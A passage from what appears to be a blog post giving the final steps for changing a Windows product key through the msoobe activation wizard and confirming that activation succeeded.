<div class="stb-info_box"><strong>%systemroot%\system32\oobe\msoobe /a</strong></div>and press enter<br />
6. Activation wizard appears<br />
7. Select activation by phone and in the next screen select the option CHANGE PRODUCT KEY, enter a valid corporate product key, press OK and close the wizard<br />
8. Reboot the computer and type the same command in the Run<br />
9. Activation wizard appears again and it shows the message <strong>WINDOWS IS ALREADY ACTIVATED</strong>.Tazhttp://www.blogger.com/profile/16923507242728566783noreply@blogger.com0